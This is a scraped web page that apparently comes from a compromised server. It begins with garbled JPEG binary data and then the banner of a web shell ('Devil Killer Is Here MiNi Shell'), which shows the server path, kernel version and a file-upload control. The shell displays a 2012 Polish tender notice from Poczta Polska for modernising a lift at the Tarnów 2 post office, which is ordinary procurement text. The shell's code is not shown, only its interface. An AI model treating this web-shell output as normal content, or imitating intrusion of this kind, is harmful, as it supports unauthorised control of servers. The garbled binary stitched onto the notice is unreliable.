JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120809/293790-N-2012.html

<p class="kh_header"><b>Kraków: Modernizacyjna wymiana dźwigu  towarowo-osobowego w budynku UP Tarnów 2, przy Placu Dworcowym 2</b><br>
<b>Numer ogłoszenia: 293790 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie , ul. Westerplatte 20, 31-045 Kraków, woj. małopolskie, tel. 124222153, faks 124222153; 124229033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacyjna wymiana dźwigu  towarowo-osobowego w budynku UP Tarnów 2, przy Placu Dworcowym 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje łączną realizację:
a)	modernizacyjną wymianę dźwigu towarowo-osobowego (zadanie inwestycyjne)
b)	wykonanie czynności zastępczego transportu ładunku pocztowego na rozdzielnię 
c)	wykonywanie usługi konserwacji i utrzymania w stałej sprawności technicznej urządzenia dźwigowego pod dozorem pełnym 

2.	Miejsce realizacji przedmiotu zamówienia
Realizacja wszystkich prac określonych w p-cie 1., obejmujących przedmiot zamówienia będzie wykonywana w budynku Urzędu Pocztowego Tarnów 2 przy Placu Dworcowym 2 w Tarnowie.

3.	 Zakres prac
1/.	Szczegółowy opis prac zadania inwestycyjnego, związanych z wymianą dźwigu towarowo-osobowego wraz z wymaganiami Zamawiającego zostały szczegółowo przedstawione w Specyfikacji technicznej wymiany dźwigu w formie Programu Funkcjonalno-Użytkowego zawartej w SIWZ.

a)  Realizacja zadania inwestycyjnego, tj. łącznego zaprojektowania i wykonania robót budowlanych polegających na modernizacyjnej wymianie dźwigu  towarowo-osobowego w budynku UP Tarnów 2,obejmuje:
-      uzgodnienie z właściwym Urzędem Dozoru Technicznego koncepcji wymiany dźwigu 
-	opracowanie dokumentacji technicznej dla montażu nowego dźwigu (w zaniżonym nadszybiu) i jej uzgodnienie w Urzędzie Dozoru Technicznego 
-	wykonanie  demontażu starego dźwigu
-	dostawa wraz z montażem nowego  dźwigu towarowo-osobowego o parametrach:  udźwig 525 kg (lub większym), z górną maszynownią, ze sterowaniem mikroprocesorowym, z nowoczesnym energooszczędnym bezreduktorowym zespołem napędowym z falownikiem częstotliwości oraz  systemem odzysku energii w czasie hamowania dźwigu, (bez przekładni tradycyjnego koła zdawczego), przenoszący napęd na kabinę poprzez pasy nośne, wyposażony w system zdalnego monitoringu dźwigu, kontrolujący stan pracy dźwigu 24h na dobę, 7 dni w tygodniu i  wykrywający  funkcje związane ze stanami pracy dźwigu oraz awarie dźwigu, które powinien w formie komunikatów przesyłać linią telekomunikacyjną pod programowalny adres,  2-u  przystankowego 
-	towarzyszące roboty budowlane w szybie, podszybiu i maszynowni tj. - wykonanie nowych otworów technologicznych i rewizyjnych dla nowego dźwigu oraz instalacji elektrycznej
-	opracowanie dokumentacji powykonawczej montażu nowego dźwigu,  uzyskanie w UDT dopuszczeń i zezwoleń na eksploatację nowego dźwigu.

2/.	 Szczegółowy opis prac związanych z czynnościami zastępczego transportu ładunku pocztowego wraz z wymaganiami Zamawiającego zostały szczegółowo przedstawione w Specyfikacji wykonywania zastępczego transportu ładunku pocztowego zawartej w SIWZ.

a)	Przedmiotem zastępczego transportu ładunku pocztowego jest transport przesyłek pocztowych umieszczonych w workach pocztowych oraz kasetach pocztowych typu KL1 i KL2, polegający na ręcznym przemieszczeniu tego ładunku (worków i kaset)  przez pracowników Wykonawcy.
b)	 Łączna  ilość ładunku pocztowego objętego transportem zastępczym sumowana za okres 1 tygodnia (od poniedziałku do niedzieli) wyniesie średnio: 5 035 szt.  ładunków / 1 tydzień, w tym:
-	864 szt. ładunków na 1 dobę w poszczególnych dniach  od poniedziałku do piątku (w tym średnio: 677 szt worków / 24 godz. oraz  187 szt kaset / na 24 godz)
-	478 szt ładunków na 1 dobę w sobotę (średnio 364 szt worków  i 114 szt kaset od godz. 00:00 do godz. 19:00)
-	237 szt ładunków na 1 dobę w niedzielę (średnio 213 worków i 24 szt kaset od godz. 19:00 do godz. 24:00).
c)	Wagi i wymiary przedmiotów ładunku wyniosą:
-	worek pocztowy z ładunkiem  - średnio - 9 kg / maksymalnie do 15 kg,
  	wymiar worka pocztowego - złożonego płaskiego: od 35x50 cm, 50x80cm, 60x100cmm, 75x100cm, 100x140cm, 120x160cm, 120x170cm
-	kaseta KL1 - średnio - 8 kg/ maksymalnie do 12 kg
   	wymiary kaseta KL1:   typ 470x267x150 mm lub typ 480x267x195 mm
-	kaseta KL2 - średnio - 8 kg. / maksymalnie do 12 kg
   	wymiary kaseta KL2:   typ 470x267x280 mm lub typ 480x267x294 mm
d)	W ramach czynności tej części przedmiotu zamówienia, ładunki pocztowe przemieszczane będą po trasie: z poziomu parteru na poziom I piętra do Rozdzielni w budynku Urzędu Pocztowego Tarnów 2.
e)	Prace te będą realizowane w czasie postojów dźwigu związanych z:
-	jego wymianą na nowy dźwig, w ramach realizacji obecnego zamówienia publicznego, 
-	jego naprawą, w przypadku wstrzymania pracy technologicznej dźwigu spowodowanej awarią  dźwigu, w  okresie 36 miesięcznej gwarancji,

3/.	Szczegółowy opis prac związanych z wykonywaniem usług konserwacji i utrzymania w stałej sprawności technicznej urządzenia dźwigowego pod dozorem pełnym wraz z wymaganiami Zamawiającego zostały szczegółowo przedstawione w Specyfikacji wykonywania prowadzenia konserwacji urządzenia dźwigowego zawartej w SIWZ.

a)	Czynności tej części zamówienia będą wykonywane zgodnie z wymaganiami przepisów określonych w Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej (Dz. U. Nr 193, poz.1890 z 2003r), dotyczącym warunków technicznych dozoru technicznego w zakresie eksploatacji niektórych urządzeń transportu bliskiego.
b)	W skład czynności tej części przedmiotu zamówienia wchodzą m.in.:
-	prowadzenie konserwacji dźwigu i utrzymania w stałej sprawności technicznej urządzenia dźwigowego
-	przygotowanie urządzenia dźwigowego do okresowego badania technicznego przez inspektora UDT oraz obowiązkowego w nim uczestnictwa
-	wykonywanie obowiązkowych pomiarów elektrycznych (rezystancji izolacji, uziemień roboczych oraz skuteczności ochrony przeciwporażeniowej)  instalacji i urządzeń dźwigu wraz z sporządzeniem protokołów
-	dokonywania bieżących napraw wraz z wymianą zużytych lub uszkodzonych podzespołów (części) i materiałów
-	z wykonanych czynności konserwacji dźwigu, Wykonawca musi każdorazowo sporządzić - Raport konserwacji dźwigu - wg SIWZ.
c)	W przypadkach awarii urządzenia dźwigowego: 
-	Wszelkie awarie i nieprawidłowości w funkcjonowaniu dźwigów zgłaszane będą całodobowo do pogotowia dźwigowego Wykonawcy
-	 Wykonawca jest zobowiązany przystąpić do usunięcia awarii (tzw. czas reakcji) w ciągu 3 godzin od momentu pisemnego lub telefonicznego, bądź faksem zgłoszenia na pogotowie dźwigowe
-	w przypadku gdy naprawa gwarancyjna dźwigu nie będzie możliwa w ciągu - 12 godzin od momentu jej zgłoszenia na pogotowie dźwigowe i związana będzie z koniecznym na czas naprawy wyłączeniem pracy dźwigu, w takiej sytuacji  Wykonawca jest zobowiązany, do:
1)	 Zapewnienia zastępczych elementów systemu (uruchomienia dźwigu) do czasu dokonania pełnej naprawy, celem minimalizacji czasu postoju dźwigu, 
2)	Wykonywania -  zgodnie z wymaganiami Zamawiającego określonymi w SIWZ, czynności zastępczego transportu ładunku pocztowego z parteru na I piętro do Rozdzielni UP Tarnów 2 - do momentu zakończenia naprawy dźwigu, rozpoczynając je nie później niż w 13-tej godzinie  od momentu zgłoszenia awarii na pogotowie dźwigowe.

4.	Przedmiot zamówienia określony w p-cie 1. ppkt a - c,  zostanie wyceniony przez Wykonawcę zgodnie z Tabelą elementów rozliczeniowych umowy - zawartą w SIWZ, w oparciu o zasady opisane w cz. VI SIWZ.

5.	 Gwarancja i rękojmia
1)	Wykonawca udzieli 12-miesięcznej rękojmii za wady przedmiotu umowy, która zostanie rozszerzona poprzez udzielenie pisemnej gwarancji.        
2)	Okres gwarancji:
a)	Dla nowo zamontowanych urządzeń (za wyjątkiem pasów nośnych i źródeł światła) - wynosi - 36 miesięcy,
b)	Dla pasów nośnych kabiny - wynosi 5 lat.  
c)	Wykonawca jest zobowiązany do wystawienia w dniu odbioru końcowego dokumentu gwarancyjnego na okres, na który udziela gwarancji. 
3)	Terminy gwarancji oraz termin rękojmi za wady biegną od daty podpisania końcowego bezusterkowego protokołu odbioru wykonania zadania inwestycyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 45.31.21.00-5, 45.21.00.00-2, 45.31.12.00-2, 90.51.20.00-9, 63.10.00.00-0, 50.75.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości:
-  6 000,00 zł (słownie: sześć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU I SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW  

2.  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu wynikające z art. 22 ust. 1 ustawy p.z.p. dotyczące m.in. posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w okolicznościach o których mowa w art. 24 ust. 1 ustawy p.z.p. 

3.	W celu potwierdzenia SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU określonych w art. 22 ust. 1 ustawy p.z.p. oraz BRAKU PODSTAW DO WYKLUCZENIA wykonawcy z postępowania o udzielenie zamówienia w okolicznościach o których mowa w art. 24 ust. 1 ustawy p.z.p zamawiający żąda następujących dokumentów:
1)	oświadczenie o spełnianiu warunków udziału w postępowaniu 
2)	oświadczenie o braku podstaw do wykluczenia 
3)	w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy
-	   wykonawca nie będący osobą fizyczną składa aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy   wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-	 wykonawca będący osobą fizyczną prowadzącą działalność gospodarczą składa odpis z właściwego rejestru (CEIDG), jeżeli odrębne przepisy wymagają wpisu do rejestru;  
-	wykonawca będący osobą fizyczną nie prowadzącą działalności gospodarczej składa oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy 

4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w 3:
4.1 ppkt 3) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,

Dokumenty , o których mowa w  pkt 3.1 lit. a , powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w  pkt 3 , zastępuje się  je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Aktualność dokumentu jak wyżej.

5. 	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania wiedzy i doświadczenia.  
	W celu wykazania spełniania przez wykonawcę warunku o którym mowa powyżej Wykonawca jest zobowiązany przedstawić:
Wykaz robót budowlanych wykonanych (zrealizowanych i rozliczonych) w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, przedmiotu i wartości, daty i miejsca wykonania oraz odbiorców wraz z załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Za spełnienie tego warunku Zamawiający uzna wykazanie, iż Wykonawca wykonał  należycie w powyższym okresie: - montaż tj. instalowanie co najmniej 2 dźwigów  towarowo-osobowych z napędem elektrycznym zrealizowany w ramach oddzielnych umów, o wartości minimum 150 000 zł brutto każdej z nich.   
	W wykazie należy wymienić montaż dźwigów nowych.
W tym celu wykonawca musi sporządzić i podpisać wykaz robót budowlanych wg schematu oraz musi załączyć do oferty dokumenty potwierdzające, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Określenie odbiorców zrealizowanych zadań następuje przez podanie ich nazw i adresów w sposób umożliwiający ich identyfikację.    
Za dokumenty potwierdzające należyte wykonanie robót budowlanych określonych w wykazie, Zamawiający uzna np. referencje lub protokoły końcowego odbioru. 
Załączone dokumenty winny w sposób jednoznaczny wskazywać roboty wykazane oraz potwierdzać ich należyte i prawidłowe wykonanie, zgodne z zasadami sztuki budowlanej. 

2.   W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
W tym przypadku wymagane jest, aby inny podmiot brał udział w wykonywaniu części zamówienia. Należy wskazać jaką część zamówienia będzie wykonywał inny podmiot, na wiedzy i doświadczeniu którego Wykonawca będzie polegał.    

3. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia.

W celu wykazania spełniania przez wykonawcę warunku, o którym mowa powyżej, Wykonawca jest zobowiązany przedstawić:
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia oraz odpowiedzialnych za kierowanie robotami budowlanymi i elektrycznymi, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia oraz informacji o podstawie do dysponowania tymi osobami.
Wykonawca sporządzi wykaz (w każdej kategorii) wg schematu z SIWZ  i dołączy go do składanej oferty:      

Za spełnienie tego warunku Zamawiający uzna wykazanie, iż Wykonawca dysponuje osobami posiadającymi właściwe kwalifikacje i uprawnienia, w tym:
1)  - nadane przez Państwowy Urząd Dozoru Technicznego: 
-   co najmniej 4 osoby z uprawnieniami do wykonywania prac montażowych dźwigów;
-   co najmniej 2 osoby z uprawnieniami  do konserwacji dźwigów  kat. 1; 
-   co najmniej 1 pracownik uprawnienia  dla  spawacza
 
2) - nadane przez Komisje Kwalifikacyjne zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. nr 89 poz. 828);
-   co  najmniej 1 pracownik z uprawnieniami Grupy I.  (elektr. do 1kV) - kategorii D, 
-   co  najmniej 2 pracowników z uprawnieniami Grupy I (elektr. do 1kV)  -  kategorii E 
-   co  najmniej 1 pracownik z uprawnieniami Grupy I (elektr. do 1kV)   do wykonywania elektrycznych pomiarów i  prac kontrolnych;

3)  -  posiadających uprawnienia  budowlane tj. uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2010r. Nr 243, poz. 1623 z późn. zm.): 
-   co  najmniej 1 osoba legitymująca się uprawnieniami do kierowania robotami budowlanymi w specjalności  budowlanej oraz posiadającymi aktualne  zaświadczenie o członkostwie we właściwych izbach samorządu zawodowego:
-   co  najmniej 1 osoba legitymująca się uprawnieniami do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego;

Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394.

2.     W przypadku gdy Wykonawca będzie polegał na osobach zdolnych do wykonania zamówienia innych podmiotów,  niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest przedstawić Zamawiającemu, pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji tych osób na okres wykonywania przedmiotu zamówienia.  


3.	Na potwierdzenie, że osoby wskazane w wykazie, o którym mowa w pkt. 1 posiadają  wymagane kwalifikacje,  wraz z ofertą należy złożyć oświadczenie (w oparciu o wzór z SIWZ) o posiadaniu przez te osoby stosownych kwalifikacji i uprawnień oraz aktualnego członkostwa w Izbie Inżynierów Budownictwa,  opisanych w w/w wykazie. 

4.   Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.   O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący sytuacji  ekonomicznej i finansowej 
W celu wykazania spełniania przez wykonawcę warunku o którym mowa powyżej Wykonawca jest zobowiązany przedstawić:
a/  opłaconą polisę OC lub inny dokument potwierdzający, że Wykonawca  posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum 500 000, zł.
	 
2.    Jeżeli wykonawca, wykazując spełnienie w/w warunku polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy p.z.p., wymaga się przedstawienia informacji o której mowa w pkt. 2.4 dotyczącej tych podmiotów 

3.   Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

